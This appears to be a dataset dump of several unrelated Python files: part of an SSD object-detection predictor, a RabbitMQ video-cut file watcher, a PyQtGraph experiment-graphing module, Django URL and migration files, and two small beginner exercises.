        # Forward pass on the original image.
        #self.net.eval() # put the network in inference mode
        x = img.unsqueeze(0)  # add batch dim: torch.Size([1, 3, 300, 300])
        with torch.no_grad():
            detections = self.net(x)
        # detections has shape torch.Size([1, 21, 200, 5]); 200 is top_k.
        ## Flip inference: flip along the width axis and run again.
        x_flip = torch.flip(img, [2])
        x_flip = x_flip.unsqueeze(0)
        with torch.no_grad():
            detections_flip = self.net(x_flip)
        #print("check box: ", (detections[2]==detections_flip[2]).sum().numpy())
        ## Gather detections from both passes into one detection tensor.
        detections_box = self.Det(detections[0], detections[1], detections_flip[0], detections_flip[1], detections[2].to(self.device))
        # Keep only predictions whose confidence meets the threshold.
        predict_bbox = []
        pre_dict_label_index = []
        scores = []
        detections = detections_box.cpu().detach().numpy()
        # Extract entries above the threshold.
        find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
        detections = detections[find_index]
        for i in range(len(find_index[1])):  # loop over the kept predictions
            if (find_index[1][i]) > 0:  # skip the background class (index 0)
                sc = detections[i][0]  # confidence
                bbox = detections[i][1:] * [width, height, width, height]
                # find_index is a (batch, class, top_k) index tuple;
                # subtract 1 because class index 0 is the background.
                lable_ind = find_index[1][i]-1
                # Append to the result lists.
                predict_bbox.append(bbox)
                pre_dict_label_index.append(lable_ind)
                scores.append(sc)
        return rgb_img, predict_bbox, pre_dict_label_index, scores
    def vis_bbox(self, rgb_img, bbox, label_index, scores, label_names):
        """
        Draw the detection results on the image.
        Parameters
        ----------
        rgb_img: ndarray
            The RGB image to draw on.
        bbox: list
            Bounding boxes, each as [x1, y1, x2, y2] in pixels.
        label_index: list
            Index into label_names for each box.
        scores: list
            Confidence per box; None renders boxes as ground-truth answers.
        label_names: list
            Class names (background excluded).
        Returns
        -------
        None. The image is shown with boxes and labels drawn on it.
        """
        # One distinct frame color per class.
        num_classes = len(label_names)  # number of classes (background excluded)
        colors = plt.cm.hsv(np.linspace(0, 1, num_classes)).tolist()
        # Show the image.
        plt.figure(figsize=(10, 10))
        plt.imshow(rgb_img)
        currentAxis = plt.gca()
        # Loop over the boxes.
        for i, bb in enumerate(bbox):
            # Label name and per-class frame color.
            label_name = label_names[label_index[i]]
            color = colors[label_index[i]]
            # Box label, e.g. "person: 0.72".
            if scores is not None:
                sc = scores[i]
                display_txt = '%s: %.2f' % (label_name, sc)
            else:
                display_txt = '%s: ans' % (label_name)
            # Rectangle geometry.
            xy = (bb[0], bb[1])
            width = bb[2] - bb[0]
            height = bb[3] - bb[1]
            # Draw the rectangle.
            currentAxis.add_patch(plt.Rectangle(
                xy, width, height, fill=False, edgecolor=color, linewidth=2))
            # Draw the label at the rectangle's top-left corner.
            currentAxis.text(xy[0], xy[1], display_txt, bbox={
                'facecolor': color, 'alpha': 0.5})
class SSDPredictShowTest(nn.Module):
    """Run SSD prediction and display the results on the image (test variant).

    NOTE(review): unlike the other predictor classes in this file, the
    forward pass here runs without torch.no_grad() and the network is not
    explicitly put into eval mode -- confirm that is intended.
    """
    def __init__(self, eval_categories, net, device):
        super(SSDPredictShowTest, self).__init__()  # run the parent constructor
        print(device)
        self.eval_categories = eval_categories  # class names
        self.net = net.to(device)  # the SSD network
        self.device = device
        color_mean = (104, 117, 123)  # mean (B, G, R) values for normalization
        input_size = 300  # resize input images to 300x300
        self.transform = DataTransform(input_size, color_mean)  # preprocessing
    def show(self, image_file_path, data_confidence_level):
        """
        Detect objects in an image file and display the result.
        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        data_confidence_level: float
            Confidence threshold for keeping a prediction.
        Returns
        -------
        None. The RGB image is shown with the detections drawn on it.
        """
        rgb_img, predict_bbox, pre_dict_label_index, scores = self.ssd_predict(
            image_file_path, data_confidence_level)
        self.vis_bbox(rgb_img, bbox=predict_bbox, label_index=pre_dict_label_index,
                      scores=scores, label_names=self.eval_categories)
    def ssd_predict(self, image_file_path, data_confidence_level=0.5):
        """
        Run SSD prediction on a single image file.
        Parameters
        ----------
        image_file_path: str
            Path to the image file.
        dataconfidence_level: float
            Confidence threshold for keeping a prediction.
        Returns
        -------
        rgb_img, predict_bbox, pre_dict_label_index, scores
        """
        # Load the image; OpenCV returns [height][width][BGR].
        img = cv2.imread(image_file_path)
        height, width, channels = img.shape  # original image size
        rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        # Preprocess. There are no annotations, so pass "" for boxes/labels.
        phase = "val"
        img_transformed, boxes, labels = self.transform(
            img, phase, "", "")
        img = torch.from_numpy(
            img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1)
        # Forward pass.
        #self.net.eval() # put the network in inference mode
        x = img.unsqueeze(0).to(self.device)  # add batch dim: torch.Size([1, 3, 300, 300])
        detections = self.net(x)
        # detections has shape torch.Size([1, 21, 200, 5]); 200 is top_k.
        # Keep only predictions whose confidence meets the threshold.
        predict_bbox = []
        pre_dict_label_index = []
        scores = []
        detections = detections.cpu().detach().numpy()
        # Extract entries above the threshold.
        find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
        detections = detections[find_index]
        for i in range(len(find_index[1])):  # loop over the kept predictions
            if (find_index[1][i]) > 0:  # skip the background class (index 0)
                sc = detections[i][0]  # confidence
                bbox = detections[i][1:] * [width, height, width, height]
                # find_index is a (batch, class, top_k) index tuple;
                # subtract 1 because class index 0 is the background.
                lable_ind = find_index[1][i]-1
                # Append to the result lists.
                predict_bbox.append(bbox)
                pre_dict_label_index.append(lable_ind)
                scores.append(sc)
        return rgb_img, predict_bbox, pre_dict_label_index, scores
    def vis_bbox(self, rgb_img, bbox, label_index, scores, label_names):
        """
        Draw the detection results on the image.
        Parameters
        ----------
        rgb_img: ndarray
            The RGB image to draw on.
        bbox: list
            Bounding boxes, each as [x1, y1, x2, y2] in pixels.
        label_index: list
            Index into label_names for each box.
        scores: list
            Confidence per box; None renders boxes as ground-truth answers.
        label_names: list
            Class names (background excluded).
        Returns
        -------
        None. The image is shown with boxes and labels drawn on it.
        """
        # One distinct frame color per class.
        num_classes = len(label_names)  # number of classes (background excluded)
        colors = plt.cm.hsv(np.linspace(0, 1, num_classes)).tolist()
        # Show the image.
        plt.figure(figsize=(10, 10))
        plt.imshow(rgb_img)
        currentAxis = plt.gca()
        # Loop over the boxes.
        for i, bb in enumerate(bbox):
            # Label name and per-class frame color.
            label_name = label_names[label_index[i]]
            color = colors[label_index[i]]
            # Box label, e.g. "person: 0.72".
            if scores is not None:
                sc = scores[i]
                display_txt = '%s: %.2f' % (label_name, sc)
            else:
                display_txt = '%s: ans' % (label_name)
            # Rectangle geometry.
            xy = (bb[0], bb[1])
            width = bb[2] - bb[0]
            height = bb[3] - bb[1]
            # Draw the rectangle.
            currentAxis.add_patch(plt.Rectangle(
                xy, width, height, fill=False, edgecolor=color, linewidth=2))
            # Draw the label at the rectangle's top-left corner.
            currentAxis.text(xy[0], xy[1], display_txt, bbox={
                'facecolor': color, 'alpha': 0.5})
import os
import pika
import json
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from inspect import getmembers
from pprint import pprint
from werkzeug.utils import secure_filename
from .lib.video import Video
from .config import endpoints_config
class Watcher:
    """Watches a directory for filesystem events and dispatches them to Handler."""

    # Directory holding the .txt cut-description files to watch.
    dir_files_videos_to_cut = os.getcwd() + endpoints_config['dir_txt']

    def __init__(self):
        self.observer = Observer()

    def run(self):
        """Start watching and block until interrupted or an error occurs.

        The observer is stopped and joined on any interruption, so the
        watcher thread never outlives this call.
        """
        event_handler = Handler()
        self.observer.schedule(event_handler, self.dir_files_videos_to_cut, recursive=True)
        self.observer.start()
        try:
            while True:
                time.sleep(5)
        except BaseException:
            # Explicit BaseException instead of a bare 'except': same behavior
            # (also stops on KeyboardInterrupt/SystemExit), but intent is visible.
            self.observer.stop()
            print("Ocorreu um erro")
        self.observer.join()
class Handler(FileSystemEventHandler):
    """Publishes one RabbitMQ cut message per line of a changed .txt file."""

    @staticmethod
    def on_any_event(event):
        """Triggered by watchdog for every event in the watched directory.

        Each line of the touched file is expected to be
        'start_time;end_time;title'. One JSON message per line is
        published to the configured RabbitMQ queue.
        """
        # Directory events and deletions carry no readable file payload;
        # the original code crashed trying to open them.
        if event.is_directory or not os.path.exists(event.src_path):
            return
        file_name = os.path.basename(event.src_path)
        file_name_video = file_name.replace('.txt', '')
        connection = pika.BlockingConnection(pika.ConnectionParameters(host=endpoints_config['rabbit_host']))
        channel = connection.channel()
        channel.queue_declare(queue=endpoints_config['rabbit_topic'])
        # 'with' guarantees the file handle is closed even if a line is malformed.
        with open(event.src_path, "r") as file_received:
            for cut_line in file_received:
                cut_information = cut_line.split(';')
                cut_data = {
                    'filename': file_name_video,
                    'start_time': cut_information[0],
                    'end_time': cut_information[1],
                    'title': secure_filename(cut_information[2])
                }
                message_cut_data = json.dumps(cut_data)
                print("Publicando mensagem de corte de video no RabbitMQ")
                channel.basic_publish(exchange='', routing_key=endpoints_config['rabbit_topic'], body=message_cut_data)
        connection.close()
def start():
    """Entry point: announce startup and run the directory watcher."""
    print('Iniciado serviço para enviar os arquivos para fila de corte.')
    watcher = Watcher()
    watcher.run()
""" TheGraph.py
Last Modified: 5/26/2020
Taha Arshad, Tennessee Bonner, Devin Mensah, Khalid Shaik, Collin Vaille
This file is responsible for implementing all operations related to graphing.
This includes both the trial graph and the real-time voltage "bar graph".
Graphing operations include creating and updating the bar graph and creating, updating,
clearing, pausing/resuming, and annotating (adding arrows to) the trial graph.
This file is also where samples are received from the sampling process.
"""
from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import TheSession as ts
import timeit
import DisplaySettingsManager as dsm
import JSONConverter
import InputManager as im
import DataAnalysis as da
import TimeCriticalOperations as tco
#Helper methods used later on
def clamp(value, minimum, maximum):
    """Return value constrained to the inclusive range [minimum, maximum]."""
    return max(minimum, min(value, maximum))
#Converts the colors
def htmlColorString(qtColor):
    """Return the CSS 'rgb(r, g, b)' string for a Qt color.

    Bug fix: the original emitted blue in the green slot and green in the
    blue slot, so every non-gray color rendered with the wrong hue in the
    graph axis labels.
    """
    return "rgb(" + str(qtColor.red()) + ", " + str(qtColor.green()) + ", " + str(qtColor.blue()) + ")"
#Initializes global variables that need to have default values or references to objects in main window
def initialSetUp(theMainWindow):
    """Initialize module globals, build the bar graph, and start its update timer.

    theMainWindow must provide trialGraphWidget and barGraphWidget; references
    to both are stored in module-level globals used by the rest of this module.
    Called once at application startup.
    """
    global graphInitialized, playing, duringITI, done, mainWindow, graphWindow
    graphInitialized = False
    playing = False
    duringITI = False
    done = False
    #Save basic references
    mainWindow = theMainWindow
    graphWindow = theMainWindow.trialGraphWidget
    #Add bar graph
    createBarGraph()
    #Apply settings from DSM and finish bar graph creation
    updateGraphSettings()
    #Start updating voltage bar according to display rate
    #Samples arrive 10 times/sec outside of trials so anything > 10 Hz doesn't matter
    voltageBarTimer.start(1000 / dsm.displayRate)
#Sets the graph's play status to parameter (i.e. true = playing, false = paused)
def setPlaying(play):
    """Set the graph's play status (True = playing, False = paused).

    In acquisition mode the time-critical sampling process is kept in the
    same play state, and pressing play on a not-yet-started session starts it.
    """
    global playing
    playing = play
    #During data acquisition...
    if im.playMode == im.PlayMode.ACQUISITION:
        #Sync time critical process to be in same play state
        tco.orderToSetPlaying(play)
        #When we press play and the session has not yet started, start it
        if play and ts.currentSession and (not ts.currentSession.sessionStarted):
            ts.currentSession.sessionStarted = True
            createTrialGraph()
#Update global variables and refresh display based on DSM
def updateGraphSettings():
    """Re-read display settings from dsm and refresh colors, timers, and graphs.

    Rebuilds the bar graph's bars (a color change needs a new BarGraphItem)
    and regenerates either the trial graph or the "No Session Loaded" label
    so new settings take effect immediately.
    """
    global dataColor, textColor, stimulusColor, axisColor, backgroundColor
    global bars
    #Define settings
    backgroundColor = dsm.colors[dsm.ColorAttribute.BACKGROUND.value]
    dataColor = dsm.colors[dsm.ColorAttribute.DATA.value]
    textColor = dsm.colors[dsm.ColorAttribute.TEXT.value]
    stimulusColor = dsm.colors[dsm.ColorAttribute.STIMULUS.value]
    stimulusColor.setAlpha(75) #Give it some transparency since it renders on top of data curve
    axisColor = pg.mkPen(color = dsm.colors[dsm.ColorAttribute.AXIS.value], width = 1)
    #Apply anti-aliasing setting
    pg.setConfigOptions(antialias = dsm.antiAliasing)
    #Update bar graph data color (requires recreating the BarGraphItem)
    barGraph.clear()
    bars = pg.BarGraphItem(x = barXs, height = barHeights, width = 1.0, brush = dataColor)
    barGraph.addItem(bars)
    #Update other bar graph settings
    barGraph.getAxis('left').setPen(axisColor)
    barGraph.getAxis('bottom').setPen(backgroundColor) #Hide axis
    barGraph.getAxis('top').setPen(backgroundColor) #Hide axis
    barGraphWindow.setBackground(backgroundColor)
    voltageBarTimer.setInterval(1000 / dsm.displayRate)
    #Update trial graph
    if graphInitialized:
        createTrialGraph(editStatus = False)
    #Update no session loaded label
    elif not ts.currentSession:
        graphWindow.clear()
        graphWindow.setBackground(backgroundColor)
        graphWindow.addLabel(text = "No Session Loaded",
                             size = "18pt", color = textColor)
#Called during initialSetUp to create the bar graph once and for all
def createBarGraph():
    """Create the real-time voltage bar graph (called once from initialSetUp).

    Builds a locked 0-5 V plot inside the main window's barGraphWidget and
    prepares the bar position/height arrays; the colored bars themselves are
    added later by updateGraphSettings, once the data color is known.
    """
    global barGraphWindow, barGraph, barXs, barHeights
    #Create bar graph
    barGraphWindow = mainWindow.barGraphWidget
    barGraph = barGraphWindow.addPlot()
    barGraph.setMaximumWidth(100)
    barGraph.setMouseEnabled(x = False, y = False)
    barGraph.enableAutoRange('xy', False)
    barGraph.setXRange(0, 1)
    barGraph.setYRange(0, 5)
    barGraph.setLimits(xMin = 0, xMax = 1, yMin = 0, yMax = 5)
    barGraph.hideButtons() #Removes auto scale button
    barGraph.setMenuEnabled(False) #Removes right click context menu
    #Add invisible bottom label so graph's are same height
    barGraph.hideAxis('bottom')
    barGraph.setLabel('bottom', "<span></span>") #Empty label on bottom
    #Add an invisible top axis so graph's are same height
    barGraph.getAxis('top').setTicks([[(0, "")]])
    barGraph.getAxis('top').setTickFont(im.popUpFont)
    barGraph.getAxis('top').setHeight(-5)
    barGraph.showAxis('top', True)
    #Create arrays of size 1 for both bar x positions and bar heights (both with values initialized to 0)
    #These will be added to the bar graph in the correct color in updateGraphSettings
    #We can't do it now because we don't know the correct color yet
    barXs = np.zeros(1)
    barHeights = np.zeros(1)
#Resets the graph (clears display and status; afterwards is ready for new call to createTrialGraph)
def resetTrialGraph(pauseOnReset = True):
    """Reset the trial graph to its pre-session state.

    Stops the display and ITI timers, clears status flags, and replaces the
    graph contents with the "No Session Loaded" label; afterwards the module
    is ready for a new call to createTrialGraph.

    pauseOnReset: when True, also pause playback via setPlaying(False).
    """
    global playing, graphInitialized, duringITI, done
    #Reset variables
    if pauseOnReset:
        setPlaying(False)
    graphInitialized = False
    done = False
    #Stop timers
    displayTimer.stop()
    itiTimer.stop()
    #In case this was called during ITI, stop ITI
    duringITI = False
    #Clear the graph
    graphWindow.clear()
    graphWindow.addLabel(text = "No Session Loaded",
                         size = "18pt", color = textColor)
#Creates the trial graph (bar graph creation in separate function)
#Optional parameter used for regenerating graph after editing display settings
#without editing the status of the graph
def createTrialGraph(editStatus = True):
    """Create and launch the trial graph for the current session/trial.

    With editStatus = True (default) this advances session state: updates the
    session info label, starts the sampling session on trial 1, and starts the
    display timer. With editStatus = False only the visuals are regenerated,
    e.g. after display settings change, without touching session status.
    """
    #Variables that persist outside this function call
    global iteration, curve, trialGraph, dataSize, data, graphInitialized, done, previousITI
    #Start with clean slate before we do anything
    graphWindow.clear()
    #Set background color
    graphWindow.setBackground(backgroundColor)
    if editStatus:
        #Update the session info label in the main window to reflect trial number
        im.updateSessionInfoLabel()
    #Create data array (this array will be displayed as the line on the graph)
    dataSize = ts.currentSession.trialLengthInSamples #Array size
    data = np.full(shape = dataSize, fill_value = -5, dtype = np.float32) #initialized to -5 (so they're off-screen)
    #Create empty graph
    trialGraph = graphWindow.addPlot()
    #Plot line in graph
    if dsm.shading:
        curve = trialGraph.plot(y = data, fillLevel = -0.3, brush = dataColor)
    else:
        curve = trialGraph.plot(y = data, fillLevel = -0.3, pen = dataColor)
    #Add graph labels
    trialGraph.setLabel('bottom', "<span style = \"color: " + htmlColorString(textColor) + "; font-size:18px\">Time (ms)</span>")
    trialGraph.setLabel('left', "<span style = \"color: " + htmlColorString(textColor) + "; font-size:18px\">Response Amplitude (VDC)</span>")
    #Axis line/tick color
    trialGraph.getAxis('bottom').setPen(axisColor)
    trialGraph.getAxis('left').setPen(axisColor)
    #Axis limits on graph
    trialGraph.setLimits(xMin = 0, xMax = dataSize, yMin = 0, yMax = 5, minXRange = 10, minYRange = 5)
    #Scale x axis ticks to measure milliseconds instead of samples
    trialGraph.getAxis('bottom').setScale(ts.currentSession.sampleInterval)
    #Removes default "A" button on bottom left corner used for resetting the zoom on the graph
    trialGraph.hideButtons()
    #Disables the context menu you see when right-clicking on the graph
    trialGraph.setMenuEnabled(False)
    #Determine what stimuli (CS and/or US) the trial has
    if ts.currentSession.paradigm == ts.Paradigm.PSEUDO:
        hasCS = ts.currentSession.pseudoTrialOrdering[ts.currentSession.currentTrial - 1]
        hasUS = not hasCS
    else:
        hasCS = True
        hasUS = ts.currentSession.usStartInSamples >= 0
    #Create CS lines and shaded area between lines
    if hasCS:
        csStart = ts.currentSession.csStartInSamples
        csEnd = ts.currentSession.csEndInSamples
        csRegion = pg.LinearRegionItem(values = [csStart, csEnd], brush = stimulusColor, movable = False)
        csRegion.lines[0].setPen(stimulusColor)
        csRegion.lines[1].setPen(stimulusColor)
        trialGraph.addItem(csRegion)
    #Same for US
    if hasUS:
        usStart = ts.currentSession.usStartInSamples
        usEnd = ts.currentSession.usEndInSamples
        usRegion = pg.LinearRegionItem(values = [usStart, usEnd], brush = stimulusColor, movable = False)
        usRegion.lines[0].setPen(stimulusColor)
        usRegion.lines[1].setPen(stimulusColor)
        trialGraph.addItem(usRegion)
    #Add CS and US text labels (as ticks centered over each stimulus region)
    stimulusTicks = []
    if hasCS:
        stimulusTicks.append(((csStart + csEnd) / 2, "CS"))
    if hasUS:
        stimulusTicks.append(((usStart + usEnd) / 2, "US"))
    trialGraph.getAxis('top').setTicks([stimulusTicks])
    trialGraph.getAxis('top').setTickFont(im.popUpFont)
    trialGraph.getAxis('top').setHeight(-5)
    trialGraph.showAxis('top', True)
    trialGraph.getAxis('top').setPen(axisColor)
    #Launch graph based on play mode
    if im.playMode == im.PlayMode.PLAYBACK:
        #Update graph with array of samples for trial
        data = JSONConverter.openTrial()
        curve.setData(data)
        #Render onset arrows
        onsets = JSONConverter.getOnsets()
        for x in range(len(onsets)):
            addArrow(onsets[x] - 1)
        #Render offset arrows
        if(dsm.renderOffset):
            offsets = JSONConverter.getOffsets()
            for x in range(len(offsets)):
                addArrow(offsets[x] - 1, False)
    #Data Acquisition
    else:
        if editStatus:
            #Regularly sample data (according to sample rate defined in session settings)
            iteration = 0
            if ts.currentSession.currentTrial == 1:
                tco.orderToStartSession()
                previousITI = 0 #First trial's previous ITI is 0
            #Regularly update display (according to display rate defined in display settings)
            displayTimer.start(1000 / dsm.displayRate)
        else:
            displayTimer.setInterval(1000 / dsm.displayRate)
    #Done initializing/creating/launching the graph
    if editStatus:
        done = False #As in done with session, which we are not (we are just starting the session!!!)
        graphInitialized = True
#Updates the display
def displayUpdate():
    """Drain newly acquired samples into the data array and redraw the curve.

    Called by displayTimer at the configured display rate while acquiring.
    Does nothing while paused; ends the trial (endTrialStartITI) once the
    sample buffer for this trial is full.
    """
    #Variables that need to be survive across multiple calls to update function
    global iteration, dataSize, curve, data, playing
    #Trial can be paused
    if not playing:
        return
    #Read in new samples
    #If ITI = 0, then there might be samples in the queue for the next trial already...
    #so make sure we don't go past our limit for this trial
    while (not tco.sampleQueue.empty()) and iteration < dataSize:
        data[iteration] = tco.sampleQueue.get(block = False)
        iteration += 1
    #Update trial graph
    curve.setData(data)
    #End of trial?
    if iteration >= dataSize:
        endTrialStartITI()
# QTimer that drives displayUpdate at the session's display rate; it is
# started (and its interval set/updated) in the trial-graph creation code.
displayTimer = QtCore.QTimer()
displayTimer.timeout.connect(displayUpdate)
# Refreshes the real-time voltage bar from whichever source is currently live.
def voltageBarUpdate():
    # While an acquisition trial is actively running (graph up, not in the
    # ITI, not paused), the freshest reading is the last sample written into
    # the trial buffer.
    runningTrial = (im.playMode == im.PlayMode.ACQUISITION and graphInitialized
                    and (not duringITI) and playing)
    if runningTrial:
        latest = iteration - 1
        # Nothing to show before the first sample arrives.
        if latest != -1 and latest < dataSize:
            barHeights[0] = data[latest]
            bars.setOpts(height = barHeights)
        return
    # All other times, fall back to the auxiliary sample queue: drain it and
    # keep only the most recent value (-1 marks "queue was empty").
    reading = -1
    while not tco.auxSampleQueue.empty():
        reading = tco.auxSampleQueue.get(block = False)
    if reading != -1:
        barHeights[0] = reading
        bars.setOpts(height = barHeights)
# QTimer that drives voltageBarUpdate (the start call is not in this section).
voltageBarTimer = QtCore.QTimer()
voltageBarTimer.timeout.connect(voltageBarUpdate)
# Wraps up the trial that just finished and, unless the session is complete,
# transitions into the inter-trial interval (ITI).
def endTrialStartITI():
    global previousITI, duringITI, itiCountdown, countdownLabel, done
    # Halt display refreshes for the finished trial...
    displayTimer.stop()
    # ...and persist its samples along with the ITI that preceded it.
    JSONConverter.saveTrial(data, float(previousITI))
    session = ts.currentSession
    # Last trial of the session: no ITI follows, just finish up.
    if session.currentTrial >= session.trialCount:
        done = True
        # Pause upon completion and show the wrap-up message.
        im.setPlaying(False)
        mainWindow.trialInfoLabel.setText("SESSION COMPLETE!\n\nPRESS STOP TO SAVE")
        # Restarting data acquisition after completion is not supported.
        mainWindow.playButton.setEnabled(False)
        return
    # Countdown label "Next trial in..."
    mainWindow.trialInfoLabel.setText("NEXT TRIAL IN...\n\n")
    # Block (up to 3 s) for the first countdown value; a timeout here means
    # the trial-control side is unresponsive, so let the exception propagate.
    itiCountdown = tco.itiQueue.get(timeout = 3)
    previousITI = itiCountdown
    if itiCountdown <= 0:
        # Zero-length ITI: jump straight into the next trial.
        endITIStartTrial()
        return
    mainWindow.trialInfoLabel.setText("NEXT TRIAL IN...\n\n{:5.1f}".format(itiCountdown))
    duringITI = True
    itiTimer.start(100)  # countdown readout updates every 100 ms
# Timer callback: advances the ITI countdown readout.
def itiUpdate():
    global itiCountdown
    # The ITI, like a trial, can be paused; freeze the countdown while paused.
    if not playing:
        return
    # Each queued item was the latest countdown value (in seconds) at the time
    # it was sent, so empty the queue and keep only the newest push.
    while not tco.itiQueue.empty():
        itiCountdown = tco.itiQueue.get(block = False)
        # Exception: at 0 stop draining — any further queued values already
        # belong to the NEXT trial's ITI.
        if itiCountdown == 0:
            break
    # Display the updated countdown with one decimal place of precision.
    mainWindow.trialInfoLabel.setText("NEXT TRIAL IN...\n\n{:5.1f}".format(itiCountdown))
    # Countdown exhausted -> move on to the next trial.
    if itiCountdown <= 0:
        endITIStartTrial()
# QTimer that runs the ITI countdown (started in endTrialStartITI).
# PreciseTimer keeps the 100 ms ticks accurate.
itiTimer = QtCore.QTimer()
itiTimer.timeout.connect(itiUpdate)
itiTimer.setTimerType(QtCore.Qt.PreciseTimer)
# Ends the inter-trial interval and kicks off the next trial.
def endITIStartTrial():
    # Clears the previous trial's graph, sets duringITI = False and stops the
    # ITI timer (all handled inside resetTrialGraph).
    resetTrialGraph(pauseOnReset = False)
    # Switch the info label over to the running state.
    mainWindow.trialInfoLabel.setText("RUNNING TRIAL")
    # Advance the session's trial counter before building the new graph.
    ts.currentSession.currentTrial += 1
    createTrialGraph()
# Draws a downward arrow on top of the data trace at the given sample index,
# colored for an onset event (default) or an offset event.
def addArrow(xPositionInSamples, onset=True):
    colorKey = dsm.ColorAttribute.ONSET if onset else dsm.ColorAttribute.OFFSET
    arrowColor = dsm.colors[colorKey.value]
    # Rotation must be given in the constructor: PyQtGraph (or PyQt) has a bug
    # where an ArrowItem's angle cannot be updated after creation.
    # Style options: http://www.pyqtgraph.org/documentation/graphicsItems/arrowitem.html
    arrow = pg.ArrowItem(angle = -90, headLen = 25, headWidth = 25, brush = arrowColor)
    # Anchor the arrow to the sample's (x, y) position on the trace.
    arrow.setPos(xPositionInSamples, data[xPositionInSamples])
    trialGraph.addItem(arrow)
|
from django.conf.urls import url
from . import views

# URL routes for this app: the index page, the ninjas listing (handled by
# views.turtles), and a color-filtered view with the color captured as the
# named regex group <color>.
urlpatterns = [
    url(r'^$', views.index),
    url(r'^ninjas$', views.turtles),
    url(r'^ninjas/(?P<color>\S+)$', views.ninjacolor)
]
|
# Generated by Django 3.1.4 on 2020-12-18 08:54
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: creates the `paket` model in the article app.

    # Must run after the comment-model migration.
    dependencies = [
        ('article', '0003_comment'),
    ]

    operations = [
        migrations.CreateModel(
            name='paket',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): max_length=5 is very tight for these fields —
                # confirm this limit is intentional.
                ('ucrt', models.CharField(max_length=5, verbose_name='Ücret')),
                ('ucrt_title', models.CharField(max_length=5, verbose_name='Title')),
            ],
        ),
    ]
|
# Reads a string and a window size from one input line, then prints every
# contiguous window of that size, separated by single spaces.
text, stop = input().split()
stop = int(stop)  # initial slice end; also the window size
start = 0
while start < len(text):
    print(text[start:stop], end=" ")
    # Once the slice end reaches the string's end, the last window was printed.
    if stop >= len(text):
        break
    start += 1
    stop += 1
|
# Demonstrates basic list operations: creation, membership test, iteration.
shoppinglist = ['Milk', 'Cheese', 'butter']
print(shoppinglist)

# `in` performs a membership test (prints True here).
print('Milk' in shoppinglist)

# Iterate the items directly instead of indexing via range(len(...));
# the original loop also contained a no-op self-assignment
# (shoppinglist[i] = shoppinglist[i]) which has been removed.
for item in shoppinglist:
    print(item)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.